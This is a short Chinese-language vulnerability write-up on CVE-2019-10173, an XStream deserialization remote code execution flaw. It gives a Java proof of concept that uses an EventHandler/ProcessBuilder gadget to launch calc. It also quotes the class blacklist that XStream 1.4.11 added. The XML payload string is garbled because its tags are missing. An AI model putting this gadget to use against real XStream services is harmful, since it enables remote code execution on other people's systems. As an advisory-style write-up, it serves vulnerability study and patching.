001-CVE-2019-10173 Xstream 远程代码执行漏洞

# CVE-2019-10173 Xstream 远程代码执行漏洞

### 一、漏洞简介

Xstream 1.4.10版本存在反序列化漏洞CVE-2013-7285补丁绕过。

### 二、漏洞影响

XStream <= 1.4.6 XStream = 1.4.10 ### 三、复现过程 **poc** ```bash package com.bigo; import com.thoughtworks.xstream.XStream; import java.beans.EventHandler; import java.io.IOException; import java.util.Set; import java.util.TreeSet; /** * Created by cfchi on 2019/7/26. */ public class Main { public static String expGen(){ XStream xstream = new XStream(); Set set = new TreeSet();
set.add(“foo”);
set.add(EventHandler.create(Comparable.class, new ProcessBuilder(“calc”), “start”));
String payload = xstream.toXML(set);
System.out.println(payload);
return payload;
}
public static void main(String[] args) throws IOException {
expGen();
XStream xStream = new XStream();
String payload = “\n” +
” foo\n” +
” \n” +
” java.lang.Comparable\n” +
” \n” +
” \n” +
” \n” +
” cmd.exe\n” +
” /c\n” +
” calc\n” +
” \n” +
” \n” +
” start“+
” \n” +
” \n” +
“\n”;
xStream.fromXML(payload);
}
}

“`

1.4.7版本白名单


1.4.10版本，黑名单未开启


1.4.10版本，黑名单未开启


1.4.11版本，黑名单开启

黑名单

“`java
private class InternalBlackList implements Converter {
private InternalBlackList() {
}

public boolean canConvert(Class type) {
return type == Void.TYPE || type == Void.class || !XStream.this.securityInitialized && type != null && (type.getName().equals(“java.beans.EventHandler”) || type.getName().endsWith(“$LazyIterator”) || type.getName().startsWith(“javax.crypto.”));
}

public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
throw new ConversionException(“Security alert. Marshalling rejected.”);
}

public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
throw new ConversionException(“Security alert. Unmarshalling rejected.”);
}
}
“`


参考链接

http://www.polaris-lab.com/index.php/archives/658/